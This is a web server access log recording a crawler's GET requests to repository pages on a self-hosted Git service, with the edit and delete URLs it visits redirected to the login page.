"/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:17:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 76184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:17:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 874] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:17:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 17783] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12791] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" -[17/Feb/2026:17:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13577] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:17:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json" [Client 74.7.227.38] [Length 11275] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:17:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14715] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10053] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:17:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10052] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:17:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14711] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15649] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15647] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:16:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 9794] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:16:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" -[17/Feb/2026:17:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/status.json" -[17/Feb/2026:17:16:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" -[17/Feb/2026:17:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/status.json" -[17/Feb/2026:17:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9960] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9956] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10122] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10118] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10697] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10686] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10307] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10307] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17063] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:17:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:17:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:17:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:17:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17060] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14335] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14334] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10012] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10008] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:16:43 +0000] - 200 200 - GET https 